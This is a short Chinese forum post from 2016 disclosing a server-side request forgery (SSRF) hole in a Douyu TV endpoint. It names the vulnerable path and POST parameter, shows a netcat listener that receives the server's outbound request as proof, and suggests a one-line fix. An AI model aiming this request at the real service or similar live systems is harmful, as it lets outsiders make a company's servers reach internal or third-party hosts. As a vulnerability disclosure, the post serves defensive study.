HanDs
NO.2

[7月漏洞公开] 斗鱼TV某处SSRF漏洞 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

斗鱼TV某处SSRF漏洞
看看有多少公司认为SSRF不算漏洞

详细说明:

#服务器

http://yuba.douyu.com

#SSRF地址

http://yuba.douyu.com/url/scrapy

# 参数, POST

url=http://www.baidu.com

漏洞证明:

ssrf.png





code 区域
nc -l -vv 8080
Connection from 119.90.48.56 port 8080 [tcp/webcache] accepted
GET /?123 HTTP/1.1
Host: 119.29.29.29:8080
Accept: */*

修复方案:

把用于取外网资源的API部署在不属于自己的机房


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
斗鱼 T V 某处 S SR F 漏洞
#1楼
发帖时间:2016-7-19   |   查看数:0   |   回复数:0
游客组